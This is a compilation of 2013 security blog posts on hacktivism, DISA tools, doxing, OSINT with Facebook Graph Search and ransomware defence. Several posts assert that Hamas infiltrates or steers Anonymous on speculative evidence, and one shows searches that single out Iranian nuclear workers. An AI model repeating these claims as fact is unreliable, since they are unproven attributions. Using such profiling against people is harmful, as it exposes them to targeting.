1. http://jesterscourt.mil.nf/2012/11/09/anonymous-getting-pwned-and-not-by-me/ 2. http://caffeinesecurity.blogspot.com/2012/03/flash-farce-dangers-of-social-media.html 3. http://www.citi.umich.edu/u/provos/papers/practical.pdf 4. http://www.outguess.org/download.php 5. https://twitter.com/YourAnonNews 6. https://twitter.com/i/#!/YourAnonNews/media/slideshow?url=http%3A%2F%2Ftwitpic.com%2Fbqiggl 7. https://twitter.com/57UN 8. http://twitpic.com/bqiggl 9. 10. http://whosin.com/pg/whois/24118207/Maine+Memes 11. http://1.bp.blogspot.com/-eUT843By6fg/UOW0hLpIPVI/AAAAAAAAAR4/XJtFKQW98T4/s1600/A6F1CaVCcAAauVR-orig.jpg 12. http://fotoforensics.com/ 13. 14. http://3.bp.blogspot.com/-XoD8s3mNNok/UOW46rchGCI/AAAAAAAAASI/vq7xXVMBlsA/s1600/ http://3.bp.blogspot.com/-gH3c9jWaIvA/UOW5FPVC2UI/AAAAAAAAASQ/DuUyE3HjKIM/s1600/ c7ef19db91b291961c56f6a16c0f38c3945ff416.69919-ela.png bf753f22430c3ba469f0aa29746ae1cefa0bd0cf.51416-ela.png 15. http://fotoforensics.com/tutorial-ela.php 16. http://1.bp.blogspot.com/-dwqS840xGT0/UOba4pedLeI/AAAAAAAAASk/zue4uhpPRTo/s1600/1+star+hit+jphide+-+ 709659093+-+cropped.jpg 17. http://2.bp.blogspot.com/-s53EOmL_EzQ/UObbe1o0bQI/AAAAAAAAAS0/kITgmFy4qkY/s1600/gym-cropped-ela.png 18. http://4.bp.blogspot.com/-09r3Z-sNAKg/UOba4hR8jqI/AAAAAAAAASo/NW3LU6V6BxM/s1600/A6F1CaVCcAAauVR-orig+-+ cropped.jpg 19. http://1.bp.blogspot.com/-VRTjt7C_HNY/UObb1IXZtuI/AAAAAAAAAS8/UgvPFdtGZ5A/s1600/sandy-cropped-ela.png 20. http://www.infosecurity-magazine.com/view/25524/ alqaeda-uses-steganography-documents-hidden-in-porn-videos-found-on-memory-stick/ 21. http://sofrep.com/15858/hidden-pictures-steganography-al-qaeda-anonymous/ http: //1.bp.blogspot.com/-S8PhSKY7q9Y/UOWz5trv8DI/AAAAAAAAARw/cd3Itevy96Y/s1600/1+star+hit+jphide+-+709659093.jpg
3.1.2
DISA Gold Disk and SRR - The Lost Security Tools (2013-01-07 10:46)
UPDATE: I have sent a FOIA request to DISA for the Gold Disk. Depending on the success of this request, I will follow up with a FOIA for the Unix SRR. You can read my request [1]here. Today I sent an email to [2]DISA requesting a public copy of the Gold Disk and SRR tools. For those unfamiliar with the tools, they used to be available from [3]http://iase.disa.mil/stigs/index.html However, the tools are now PKI protected and no longer accessible to the public. According the DISAs web site these tools are unlicensed...putting them in the public domain. Here is a description of both tools directly from DISAs website:
Security Readiness Review (SRRs) Scripts test products for STIG compliance. SRR Scripts are available for some operating systems and databases that have STIGs. The SRR scripts are unlicensed tools developed by the FSO and the use of these tools on products is completely at the users own risk. The DISA FSO Windows Gold disk tool provides an automated mechanism for compliance reporting and remediation to the Windows STIGs. The FSO Windows Gold Disks are an unlicensed tool developed by the FSO, the use of this tool is completely at the users own risk.
121
BlogBook
3.1. January
Currently, the Gold Disk supports Windows XP, Windows Vista, Windows 2003, Windows 2008 R1. There are no plans to develop Gold Disks for future technologies or products, FSO will utilize the SCAP standards for compliance reporting for Windows 7. Hopefully they will provide the tools without any issue. If not, my next step will be a FOIA request. It is my hope that should they provide the tools, that someone may continue working on them for private sector use. In the meantime...SCAP versions of all STIGs (DISA security guides) are publicly available: [4]http://iase.disa.mil/stigs/dod purpose-tool/index.html
1. http://caffeinesecurity.blogspot.com/2013/07/disa-gold-disk-foia-request-sent.html 2. http://iase.disa.mil/ 3. http://iase.disa.mil/stigs/index.html 4. http://iase.disa.mil/stigs/dod_purpose-tool/index.html
3.1.3
If Anonymous is to Survive They Must Remove the Mask (2013-01-13 11:51)
[1] Over the past couple years Anonymous has gone from a group of pranksters doing it for the lulz to a massive global collective of political activists and hacktivists. But theres trouble brewing for Anonymous. As a group with no membership roster and no criteria for joining they have opened themselves up to inltration. The aw which will be Anonymous downfall is that anyone can be Anonymous. Inltration by who you might ask? For one...law enforcement agencies. The best example of recent inltration would be the cooperation of [2]Sabu with the FBI. His cooperation resulted in the arrest of multiple Anonymous members and should have served as a wakeup call to the rest of the group that they must reform or die. But inltration by law enforcement should be the least of Anonymous worries. It is beginning to come to light that Anonymous may be [3]unwitting mules for terrorist organizations. And lets not forget that the Mexican drug cartel Zetas were recently burned by Anonymous and [4]swore revenge. Anonymous members who had nothing to do with the confrontation with the Zetas may be subject to inltration and revenge by the Zetas as guilt by association. Unlike law enforcement the Zetas dont really care about due process or burden of proof...and will simply snatch someone in the middle of the night and kill them. 122
3.1. January
BlogBook
So this is a message to any Anonymous members who will listen - if you want to survive you need to remove the mask. Otherwise you will be led to your doom like lambs to the slaughter. There are already leadership structures within Anonymous - everyone knows this. Drop the Anonymous mask completely. Start keeping membership rolls - and purge yourselves of the undesirables - especially terrorist organization members. And nally - if you really want to make a dierence stop the illegal activities, such as hacking or denial of service attacks. Youll gain a lot more credibility if you start performing your political activism legally instead of through illegal means. You can either be labeled as criminals, or heroes. But not both.
1. http://4.bp.blogspot.com/-y1_c0_-f_Ro/UPLl4UqZSqI/AAAAAAAAATo/hUO38HWT7jA/s1600/anonsheep.png 2. https://twitter.com/anonymouSabu 3. http://sofrep.com/15858/hidden-pictures-steganography-al-qaeda-anonymous/ 4. http://www.guardian.co.uk/technology/2011/nov/02/anonymous-zetas-hacking-climbdown
3.1.4
Seculert Using Scare Tactics to Obtain Customers? (2013-01-13 12:04)
I received a pretty disturbing LinkedIn message a while back from someone claiming to have knowledge of compromised systems within my companys internal network... Ken I saw your post about security. I am in security as well. Maybe we could meet up as I am in Baltimore. I am doing some consulting for www.seculert.com Check it out it is pretty incredible stu. I can show you all of <removed>s compromised machines from the Botnet network and our software by not going to your network. It is insane. After visiting Seculert using a browser with paranoid security settings (yay NoScript!), I found they actually appear to be a legitimate company...although I use the term lightly based upon the above message. They apparently oer intelligence-based cyber threat management through searching the internet. No dierent from setting up some well written Google alerts really. Whats really interesting is that this spam message came from a [1]LinkedIn prole which is highly recommended by managers from SourceFire and Tenable Network Security. I replied to this message from Stephen trying to obtain more information to verify the validity of his claims, and received absolutely no response. I performed several searches for similar spam messages, but couldnt nd any. So perhaps this is a new advertising technique they are testing? Im curious to hear their response. I performed a little research on Seculert, and couldnt nd much. Seculert.com has been around since 01/03/2010. The domain seculert.com is hidden by DomainsByProxy, and the website provides basic details for contact information, listing the company as originating in PetachTikva, Israel. Seculerts [2]Twitter account has been active since August 2010. They have 550 followers, and follow 73 people. Only 182 tweets have been sent. Seculerts [3]LinkedIn page states they have between 1-10 employees. Based upon the above info, this is most likely a real company...but I really question: 1) Their advertisement scare tactics and 2) The value of their services, when you can setup Google Alerts to perform the same functions. I encourage Seculert to reply here, especially to address my concerns regarding scare tactic spamvertisements over LinkedIn.
1. http://www.linkedin.com/in/stephenschwingpentesting 2. https://twitter.com/seculert 3. http://www.linkedin.com/company/seculert
123
BlogBook
3.1. January
3.1.5
Spam (2013-01-13 12:05)
[1]Brielle Franklin[2]October 10, 2012 11:58 AM I was devastated last month when all the GoDaddy sites went down. I panicked a little because I thought I may have lost everything. Then I remembered that a few months ago I started backing everything up because of an article I read about having a [3]disaster recovery plan. Even though this wasnt quite a disaster I still was able to do my work for the day instead of getting behind. Thanks for sharing this post. http://www.sungardas.com/Solutions/DisasterRecovery/Overview/Pages/D isasterRecoveryOverview.aspx
1. http://www.blogger.com/profile/11755041481969452357 2. http://caffeinesecurity.blogspot.com/2012/09/the-anonymous-lies-keep-building.html?showComment= 1349884709887#c4855407602713684496 3. http://www.sungardas.com/Solutions/DisasterRecovery/Pages/DisasterRecoveryOverviewRedirect.aspx
3.1.6
Do you enjoy my posts? Nominate me for a Shorty award! (2013-01-15 15:41)
Security isnt one of the Shorty Awards main categories...but that doesnt mean you cant nominate me for an award in it! What are the Shorty Awards? From their website:
The Shorty Awards honor the best in social media; recognizing the people and organizations producing real-time short content across Twitter, Facebook, Tumblr, YouTube, Foursquare and the rest of the social web. I strive to provide the best cyber security related content available. If you appreciate the content I provide please head over to the [1]Shorty Awards and cast your vote for me in #security. This will help me to provide my content to an even broader audience and help promote security awareness! Thank you!
Nominations open: January 7, 2013 Nominations close: February 10, 2013 Awards ceremony: April 8, 2013 in New York
1. http://shortyawards.com/CaffSec?category=security
3.1.7
Reaching out to the @EFF for assistance with DISA Gold Disk and UNIX SRR FOIA Request (2013-01-17 17:30)
Due to DISAs resistance for my request for a public copy of the DISA Gold Disk and UNIX SRR security evaluation tools I have reached out to the Electronic Frontiers Foundation for assistance with ling a Freedom of Information Act request. I have already been informed by the DISA Oce of General Counsel that this is a technical issue not a legal issue. I hope that with their help I can acquire the following for DISA Gold Disk and UNIX SRR: 124
3.1. January User Documentation Binary Executables Source Code Developer Documentation All other related documents Stay tuned!
BlogBook
3.1.8
Entropia - The Online Sweatshop Scam (2013-01-28 11:06)
It isnt often that I talk about video games on my blog. However...I recently had an encounter with a pyramid scheme/scam so disappointing that I had to write about it. At the suggestion of several online friends I recently started playing [1]Entropia Universe. For those who dont know this is a Free to Play MMORPG. I use the term Free to Play rather loosely...as I believe the game should actually be termed Free or Play. The currency in the game PED has a direct conversion ratio to real US dollars: $1 = 10 PED. You can earn PED in game by hunting animals or mining resources. You can deposit real money to get started...or earn money in-game. Sounds good right? Too good to be true? A game that pays you to play? Now the catch... The entire game is a casino with the odds stacked in the houses favor. As youre out hunting or mining...all of your equipment degrades and must be repaired. In fact the equipment degrades so quickly...and your ammo is depleted much faster then your income...that you end up losing all your in-game currency. Sure - theres a chance you could score big and nd an item worth hundreds of PED. But the odds of that occurring are so low...you still might not recoup your losses. At one point I had accumulated 6 PED from gathering resources and hunting animals. But by the time I was done...I had no ammo and my medkit was completely broken. Since it was a starter medkit it couldnt be repaired. So rst I replaced my medkit. I found what appeared to be a really good medkit on the auction house for 5 PED...leaving me 1 PED to buy ammo. That should be plenty I thought! So I buy the medkit...and I cant equip it. Apparently someone sold me a BROKEN medkit. I take my remaining 1 PED and repair the medkit. But apparently 1 PED is only enough to repair the medkit by two percent...meaning the kit will break after just a few uses. Im also now completely broke money-wise...and still havent purchased any ammo. At this point...youve got two options. The easier method of continuing to play is to deposit real money. However this could be rather expensive...as it would take a $100 deposit to obtain only 1000 PED. The harder method...but less expensive...is to gather sweat from creatures. You literally stand there with a sweat collector tool while creatures slowly kill you. Not exactly a fun process by any means. Apparently the sweat from animals is used in creating mind force...the Entropia version of magic. The current going rate for sweat is two PED for one thousand sweat. In real world money...thats $0.20 US. Sound good right? $0.20 US for gathering 1000 virtual items. I started gathering sweat. And about an hour later...I had gathered 100 sweat! Only 9 hours to go...and Id be able to gain a full lot of 1000 sweat. This is where basic math shows that its not really worth the eort. We can calculate our pay rate by solving the following equation:
125
BlogBook Total pay = Rate (times) Time So plug in our numbers and simplify the equation:
3.1. January
$0.20 = Rate X 10 hours Rate = $0.20/10 hours Rate = $0.02/hour The fact that youre gathering sweat is truly ironic...since youre being paid sweatshop wages. There are people in the game who do make a lot of money... and much like any pyramid scheme the early adopters gain all the spoils. Players who have been around for a rather long time have purchased land deeds and actually collect taxes from those who hunt or gather resources on their land. And while they sit back and rake in their fortunes...new players are for the most part completely unaware that they are being exploited by the early adopters of the game. However...Im happy to announce that I found a way to win at Entropia...a method which is most likely frowned upon by the game creators and the players who exploit the newbies. I uninstalled the game. NOTE: The original article stated that $10 = 1 PED. This has been corrected to $1 = 10 PED and all calculations adjusted. Sadly - this changes the pay rate for sweating to $0.02/hour instead of the original $2/hour.
1. http://www.entropiauniverse.com/
3.1.9
Anatomy of a Twitter False Flag-Spam and Dox Attack (2013-01-28 22:03)
Recently an alarming number of Twitter users have been suspended for doing nothing wrong. This originally started in April as reported by the conservative news site [1]Human Events and has begun to recently spiral out of control beyond the realm of politics and simple account suspensions. The original attack is quite simple - get enough Twitter users to report a user for spam...and the target users account is suspended. According to [2]Human Events this attack was originally being used by left wing liberals to silence right wing conservatives for expressing their views. While I will not get into the political issues of this and why this goes against freedom of speech...something I will mention is that a defense network is being built to help protect against these attacks. Called the Twitter Gulag Defense Network (TGDN) tips are shared among members as well as follow backs implemented...the idea being that the more accounts you have following you the more protected you are against people gaming the spam ag system...as most spammers have very few followers. Unfortunately I recently saw this attack take on a much more sinister twist against someone I frequently chat with on Twitter. Hacking groups such as subgroups of Anonymous and other groups have begun performing these attacks while simultaneously doxing the target. This attack requires coordination and timing. The ultimate eects are quite devastating...as the victims online identity is attacked while simultaneously attacking the person in real life through harassing phone calls to the target and targets family, and in some cases, attempts to destroy their credit rating. Using Maltego I mapped one of these twitter censorship networks based upon frequency of tweets exchanged and common hashtag subjects. Note that I am not including specic account names or real names (yes I found several of their names and addresses) because unlike those who I investigated I do respect their privacy and will not reveal their personal information to the public. 126
3.2. February
BlogBook
[3] The networks themselves seem to work in an interesting hierarchy. A small group of two or three leaders provide target information to the rest of the network...some of which are not aware of the other parts of the network, much like a [4]terrorist cell. One or more groups work on gathering and posting dox of the persons personal information...while a much larger group works to false ag-spam the target account(s). The groups use resources such as Tor, Pastebin, and Doxbin to coordinate their attack...often times not knowing who will actually be using the gathered information. To increase their success often sock-puppets are used to taunt the person into replying...then report the person for spam. Once enough spam reports have been received using a ratio of followers-to-reports, Twitter automatically blocks the account. Twitchy has an excellent [5]guide to defending yourself from the false ag-spam attacks. As for doxing...the best defense is to minimize your digital footprint through your social media privacy settings as well as be vigilant for phishing attempts. Should you become the victim of doxing its best to [6]involve law enforcement.
1. http://www.humanevents.com/2012/04/30/attack-of-the-flag-spammers/ 2. http://www.humanevents.com/2013/01/08/the-twitter-gulag-defense-network/ 3. http://4.bp.blogspot.com/-RaYdWD-r9J0/UQc3klPEDJI/AAAAAAAAAUA/U9r4xFe7tOQ/s1600/censorship-dox-network.png 4. http://en.wikipedia.org/wiki/Clandestine_cell_system 5. autotweet&utm_medium=twitter&utm_campaign=twitter 6. http://theconservativetreehouse.com/2012/11/28/ http://twitchy.com/2013/01/08/ tgdn-boot-camp-twitter-gulag-defense-network-founder-shares-tips-for-avoiding-twittergulag/?utm_source=
the-illegal-activity-of-doxing-revealing-documents-or-personal-information-about-a-person-without-their-permission-w
3.2
3.2.1
February
White House to Issue Cyber Security Executive Order (2013-02-11 21:39)
According to [1]TheHill.com the White House will release an executive order this week to address cyber security and critical infrastructure. Id like to share with everyone a letter I wrote in January 2012 as part of an application to the White House Fellowship program (my application was turned down). [2] [3]
127
BlogBook
3.2. February
Mr. President, I believe that a national cyber security education and protection program should be established. This program would not only target cyber security professionals, but all Americans, especially the average home or business user, and owners of critical infrastructure such as power, phone, gas, and water. Most cyber attacks are launched from networks of compromised systems, called botnets. A system normally becomes compromised due to a users lack of proper security controls and procedures, including missing or out of date antivirus software, missing or disabled rewall software, or missing vendor security patches. These factors combined with lack of understanding how systems become infected with malware results in the average users system becoming infected. Most malware infections could be prevented through basic user education. The Federal Information Security Management Act (FISMA) does an excellent job of holding Federal agencies and contractors responsible for the security status of their computer systems. However, FISMA provides no guidance for the private sector or home users. Payment Card Industry (PCI) provides requirements and guidance for the private sector when dealing with credit card transactions, but this does not apply to many businesses. As long as security guidance is lacking in the home and private sector, continued malware infections will threaten the entire United States, including Federal systems. Infected private systems can be used as cyber weapons to attack government systems, steal nancial details, and possibly even disrupt critical infrastructure. A national cyber security education and protection program would: Raise user awareness on the necessity of antivirus and rewall computer security software, as well as the need to install vendor security patches. Educate users on the threats which can be encountered online, and how to protect themselves. Protect critical infrastructure through regulatory requirements designed to prevent attacks against power, phone, gas, and water services. It is my belief that through guidance and critical infrastructure regulation, users can become aware of the critical threats against their computer systems, and how to protect themselves. After all, a threat to one system is a threat to all systems. Thank you, Ken Buckler [4]Link to Original Letter Im very anxious to see how my letter compares with the actual executive order once it has been released.
1. http://thehill.com/blogs/hillicon-valley/technology/ 282269-white-house-poised-to-release-cybersecurity-executive-order-on-wednesday 2. http://www.blogger.com/blogger.g?blogID=8334696259846048585 3. http://www.blogger.com/blogger.g?blogID=8334696259846048585 4. https://docs.google.com/document/d/1Aa8XRiHJTTLMuvhWRn0Cs5xgGeEIuNFe4RbEl7NMsGg/edit?usp=sharing
3.2.2
Identity of @th3j35t3r Revealed (2013-02-14 20:14)
While this post is not directly related to security...I felt it was worth sharing with others. Who is [1]th3j35t3r? Thats the million dollar question now isnt it? For those not familiar th3j35t3r is a cyber-activist known for attacking known terrorist websites as well as Westboro Baptist Church and factions of Anonymous. There have been many attempts to identify the true identity of th3j35t3r...but according to him [2]none have been correct. 128
3.2. February
BlogBook
The endless attempts to nd th3j35t3rs true identity has become a humorous game for him...to the point that he has set his Twitter background picture to supposedly contain an encrypted version of his full identity. [3] The image which supposedly contains th3j35t3rs identity.Another theory which has been circulating is that th3j35t3r is not just one person but actually a group of several people associated with Tom Ryan...the security researcher responsible for the [4]Robin Sage experiment. Lets look at just a few of the actions th3j35t3r has taken...
He has taken down multiple terrorist organization communication forums. He has taken down Westboro Baptist Church in response to their picketing soldiers funerals. He correctly identied a key Anonymous hacker Sabu as Hector Monsegur possibly leading to his arrest. More importantly...
He has raised online security awareness for many people He has exposed possible links between terrorist organizations and Anonymous He has raised awareness of the [5]Wounded Warrior Project...an organization devoted to helping wounded service members. Th3j35t3rs actions have angered the terrorist organizations...the Westboro Baptist Church...and the entire Anonymous collective...and yet they are unable to intimidate or stop him. Th3j35t3r works completely alone...and because of that he does not need to worry about someone betraying his identity. So who is th3j35t3r? The fact of the matter is...the real name of th3j35t3r doesnt truly matter. Th3j35t3r is an idea...a light in the darkness...a beacon of hope. He is proof that one person can make a dierence despite all opposition. In todays word...with so much resistance against individuality a pressure to conform to society...he is a symbol that you need not align yourself with others in order to eect change. Even if you disagree with th3j35t3rs message and actions...you should not overlook the underlying symbolism of what he stands for - that one person can make a dierence. Never give up on what you believe in - be the light in the darkness. Be the beacon of hope. Do not be intimidated by the words or actions of others...and given enough patience you will succeed.
1. https://twitter.com/th3j35t3r 2. http://pastebin.com/vrVey16U 3. https://twimg0-a.akamaihd.net/profile_background_images/672836329/6ee312697a0642b68edcde16a93aac2d.gif 4. http://www.networkworld.com/news/2010/070810-the-robin-sage-experiment-fake.html 5. http://www.woundedwarriorproject.org/
3.2.3
Tracking Your Digital Footprint with Google (2013-02-18 23:59)
http://www.infosecisland.com/blogview/19318-The-Subtle-Art-of-OSINTOpen-Source-Intelligence.html?utm medium=twitter &utm source=twitterfeed

129
BlogBook
3.2. February
3.2.4
Facebook Graph Search and OSINT (2013-02-20 20:21)
Facebook Graph Search is one of the newest features of Facebook. It allows you to data-mine every person and page on the entire social network. You can get an introduction at [1]this page. Its not available for everyone yet...but you can sign up for early access if youd like. It is extremely powerful as an OSINT (Open Source Intelligence) tool. A tumblr site called [2]Acutal Facebook Graph Searches show some of the more interesting search results. So, I decided to give it a try myself. The results are rather eye opening. Many including Th3J35t3r and myself have repeatedly warned that Anonymous has been inltrated by terror organizations such as Hamas. As they say...the proof is in the pudding. One of the rst searches I performed was People who like Izz ad-Din al-Qassam Brigades and like Anonymous. For those not familiar...Izz ad-Din al-Qassam Brigades is the military branch of the terrorist organization Hamas.
[3] Sample search results for People who like Izz ad-Din al-Qassam Brigades and like AnonymousThe results really do speak for 130
3.2. February
BlogBook
themselves. Its clear that there are many who associate themselves with both Anonymous and Hamas. The next search I performed could be quite dangerous. Current Iran residents who work at Nuclear Power Plants
[4] Sample search results for Current Iran residents who work at Nuclear Power Plants Its already known that spy agencies of countries who do not want to see Irans nuclear program advance have been [5]killing Iranian nuclear scientists. Despite this...many Iranians who work at Irans nuclear power plants have listed their employment location...opening themselves up to possible assassination. Graph search can also provide some interesting political and employer aliations...
131
BlogBook
3.2. February
[6] ple
who
like
Communism
and
work
at
PeoMSNBC[7]
who
like
Marxism
and
work
at
People CNN[8]
132
3.2. February
BlogBook
People who like National Rie Association and work at Fox News Note that Facebook automatically replaced MSNBC with alternatives - such as NBC TV shows. It also includes previous employers in the search. So what does this all mean? Well...it might be time to review your privacy settings. Furthermore...you might want to clean up your likes. Especially if youre a member of a terrorist organization or employed by the media.
1. https://www.facebook.com/about/graphsearch 2. https://www.facebook.com/about/graphsearch 3. http://2.bp.blogspot.com/-tA9Wi3qfqcs/USVtmFoNq5I/AAAAAAAAAUY/1k8iz8pI6OE/s1600/anonhamas.jpg 4. http://3.bp.blogspot.com/-V0PHSeqWE9E/USVwm39ok3I/AAAAAAAAAUs/B-BRb8KX_H8/s1600/iran-nuclear.jpg 5. http://www.guardian.co.uk/commentisfree/2012/jan/16/iran-scientists-state-sponsored-murder 6. http://3.bp.blogspot.com/-jYr8JVgqyrY/USVzVDrnK7I/AAAAAAAAAVA/FO-XYv0nefQ/s1600/msnbc.jpg 7. http://4.bp.blogspot.com/-ILYapCTgSO4/USV0dDiQpwI/AAAAAAAAAVM/m0-yXj65kto/s1600/cnn.jpg 8. http://4.bp.blogspot.com/-W0h20OYJMP0/USV1EnPvvzI/AAAAAAAAAVU/tm9GFwdozNQ/s1600/foxnews.jpg
133
BlogBook
3.3. March
3.2.5
Browsing Safely on an Unsecured Network (2013-02-21 20:00)
Today I was requested to provide a few recommendations for safely browsing the web while on a public wi. Always happy to oblige...here it is. Unsecured networks - such as a public WiFi hotspot - can be absolutely great for saving you money. However, these networks are not always the safest to use without some additional protection. Besides making sure to have updated Firewall and Anti-Virus software, you should also consider setting up a virtual private network (VPN). A VPN creates a private tunnel to route your internet trac securely. The rst method for securing your connection is to setup your own VPN server at home, then connect to the VPN from any public network. The best software I could nd for this is [1]OpenVPN. This software would allow you to setup your own private network directly connected to your home network...and would be the safest option. However, it is not easy for the average user to setup, and there may be licensing fees involved. An alternative which is almost as safe as using your own home VPN is to use [2]HotSpotShield. This software allows you to connect to their companys servers and not your own. A free (ad-supported) version is available as well as a monthly fee version. If considering this for regular use I would recommend paying the $29.95 per year. A third option which is slightly more risky is to use [3]Tor. This option is considered more risky because youre routing through several random servers on the Internet. The network is 100 % user supported with no ads. However...you have very little guarantee of being on a secure exit node...and could possibly end up with an exit node setup to monitor your every browser click. Finally, no matter what option you select, consider installing [4]HTTPS Everywhere. This add-on enforces HTTPS whenever possible on most websites - and provides for an additional layer of security. Do you have any additional tips for securing your connection over an unsecured wi network? Please feel free to share in the comments below.
1. http://openvpn.net/ 2. http://www.hotspotshield.com/en 3. https://www.torproject.org/ 4. https://www.eff.org/https-everywhere
3.3
3.3.1
March
Caeine Security Blogging On The Go! (2013-03-05 21:48)
I recently purchased a Samsung Galaxy Tab 2 10.1. I also purchased a bluetooth keyboard to accompany it. This means Ill be able to blog on the go, and hopefully provide even more content on a regular basis! Stay tuned, and Ill soon provide a list of the security related software Ive loaded.
3.3.2
Guest Post: Ransomware Threat Escalates Worldwide (from @pentesttraining)

(2013-03-07 19:18)
The following is a guest post submitted to Caeine Security. The owner of Caeine Security is not responsible for its content. Consumers face a growing malware threat that echoes the fear and helplessness of a kidnapping. The latest malware ploy, called ransomware, literally holds a users data hostage. In return for the promise of unlocking the computer or cell phone, digital kidnappers demand money or potentially lucrative information. Experts estimate that ransomware netted criminals over $5 million in 2012 alone. How Ransomware Kidnaps Data 134
3.3. March
BlogBook
Ransomware is digital extortion that locks out users from their computers until a demand for money is met. This type of malware is also known as a cryptotrojan, cryptovirus, or cryptoworm and uses two ploys. Lockscreen ransomware displays a full-screen image or website that blocks the user from further computer access. The Reveton Trojan attacks, which peaked in 2012 and purport to be from the FBI, are of the lockscreen type. Encryption ransomware encrypts a systems les and promises a decryption code in exchange for money. Some of the encryption algorithms are so strong that the victim in eect loses all les. Ransomware is drive-by malware that infects users who visit compromised websites. The victim sees a frightening message, which often purports to be from a law enforcement agency, stating that the user has accessed an illegal website or violated a law. In exchange for online payment of a ne, the user will receive a code to unlock the screen or decrypt les. Unfortunately, paying up does not result in a password, and meanwhile the malware installs on the infected system to capture personal data. Duped users must spend even more money to hire a computer expert to clean the system. The ransomware threat has exploded within the past two years and continues to grow. According to ABC News, security software rm Symantec has traced the largest exploits to 12 hacker gangs. Although British police caught one gang in December 2012, exploits are spreading globally. One attack hit over 500,000 users within two weeks, and 3 percent of them obeyed the ransom demands to no avail. Their computers remained locked, and the scammers got away with the money. How to Rescue Kidnapped Data Experts recommend that users not give in to ransomware demands as attackers have no intention of releasing the system. If users capitulate, they will lose money or sensitive information and will not regain access. Further, malware will continue to run silently and capture personal information. Victims should always assume that a system is still compromised until a computer expert has recovered it. As an example, Symantec in February identied a variant called Trojan.Ransomlock.Y that lurks on pornography sites and prompted a January 2013 spike in ransomware attacks. The lockscreen ransom note claims to be from the FBI and states that the user has violated criminal law and must pay $200 via MoneyPak within 72 hours. Doing so does not unlock the system, and the FBI advises victims not to pay. Instead, users should engage a skilled technician to disinfect the computer. They should also report ransomware incidents to the IC3 at ic3.gov, a joint initiative between the FBI and the National White Collar Crime Center to combat Internet crime. Security software vendors have publicized steps to remove specic ransomware variants. Power users may wish to attempt this on their own. However, the safest bet is to hire a professional to clean the system and ensure that malware is not running in the background. If the attack is encryption malware, even an expert might not be able to rescue the les. How to Defend Against Ransomware The best defense against ransomware damage is to regularly back up data. While technicians can remove most infections, some systems will have partly or totally unrecoverable les. Further, current backups provide access while the infected computer is being worked on. Users should be wary of trying to remove ransomware on their own. Even if commercial software manages to unlock the screen, malware could still be running in the background and capturing sensitive data such as passwords and account numbers. Commercial anti-virus products can detect common ransomware, and users can foil many attacks by simply keeping anti-virus and anti-spyware software up to date. Additionally, users should follow computer housekeeping procedures such as these:
Back up data to an external source such as a cloud service or storage device that is usually disconnected from the computer. Consider automating backups to run every 24 hours at a convenient time. Keep anti-virus and anti-spyware software current and congure automatic updates. Make sure that security software automatically scans all downloads either as part of browser integration or in real time.
135
BlogBook
3.3. March
Install software updates. Many operating system, software and browser patches contain crucial security xes. Disable Bluetooth when not in use and do not automatically accept unknown connections. Disable AutoPlay and disconnect removable drives when not in use. Data kidnapping preys on users desperate to regain access to personal or professional les. Sophisticated techniques can intimidate even people savvy enough to sidestep most malware. To contain the threat, users must learn to lock down their systems before hackers do it for them. About the Author This is a guest post from [1]Megan Horner, Marketing Coordinator at TrainACE. TrainACE oers advanced [2]advanced cyber security training such as Mobile Hacking and Wireless Security. Follow TrainACE on Twitter [3]@pentesttraining.
1. https://plus.google.com/u/0/108360956002935408468/about 2. http://www.trainace.com/security/ 3. http://twitter.com/pentesttraining
3.3.3
FREE Game Download: PC Defender (2013-03-16 00:51)
To help promote my blog a little Ive decided to start making a few security-themed games. The rst game Im releasing is PC Defender.
[1] The game is very simple - but provides increasing levels of diculty as you continue to play. Your ship is your anti-virus software. Your mission is to eradicate as much malware as possible. Its a silly yet addictive game. I hope you enjoy it! You can download the game [2]here. The game was created using Game Maker. As always...be sure to scan with anti-virus any le you download from the Internet.
1. http://2.bp.blogspot.com/-D82Kt9sFaBY/UUP5dvo-tXI/AAAAAAAAAWc/H5kPafXi2mo/s1600/screenshot.jpg 2. https://docs.google.com/file/d/0B1ZA4ubLZ4YKa0Nhcjh5WE5xQm8/edit?usp=sharing
136
3.3. March
BlogBook
3.3.4
CASP now DoD 8570 Approved - Free Practice Exams to Help Study!
(2013-03-16 15:34)
According to DISA the CompTIA Advanced Security Practitioner (CASP) is now 8570 approved. [1]http://iase.disa.mil/eta/iawip/content pages/iabaseline.html This is great news for those looking for a more aordable alternative to CISSP for IAT level III and IAM level II compliance. As one of the rst recipients of the CASP I am absolutely thrilled by this and feel DISA has chosen the correct categorization for this certication. Its a very tough certication - and requires the person taking the certication to have hands-on experience with multiple security and networking technologies. If youre looking to take the CASP I would recommend taking practice exams for the CompTIA Security+, CISSP, and Cisco CCNP. You can access all of these practice exams for free at my [2]Career Tools blog.
1. http://iase.disa.mil/eta/iawip/content_pages/iabaseline.html 2. http://caffeinejobs.blogspot.com/p/certification.html
3.3.5
Anonymous OpIsrael - Prelude to a Hamas Attack? (2013-03-16 16:43)
On April 7th Anonymous plans to disable the Israel governments Internet capabilities [1]through a massive hacking/denial of service attack. It has been long suspected that Hamas has a great inuence inside Anonymous. Th3j35t3r and others, including myself, have repeatedly warned that Anonymous has been inltrated by terror organizations - and #OpIsrael may be Hamas way of disabling Internet communications of the Israel government prior to an attack. Today I performed some analysis using Recorded Future with some interesting results. In November 2012 there was signicant activity by Anonymous and Hamas against Israel. However, even more interesting is that Hamas activity decreased during several days which Anonymous began to carry out cyber attacks. According to Recorded Future Anonymous attacks on April 7 are only a few days before planned Hamas activity in Israel. At the very least, these two events are extremely interesting coincidences. You can view my analysis at [2]Recorded Future. However, the rabbit hole goes a little deeper. Ive recently uncovered an #OpIsrael related image which has suspected embedded steganography.
137
BlogBook
3.3. March
[3] The original image is available on [4]Twitter. The image provided a 1 star hit for containing hidden data using jphide. I will be attempting to crack it - but if anyone else would like to give it a try that would be great. If you look closely at the image you will nd that there is a thin white strip on the side of the photo - making the photo 599 pixels wide and 597 pixels tall. Kind of an odd size for an image. Looking back at my [5]original steganography post you will see that the suspected steganography image was an unusual size as well...with one extra row of pixels added. Is any of this condemning proof that Anonymous is being controlled by Hamas? No - but its all very interesting when you take a step back and look at the big picture.
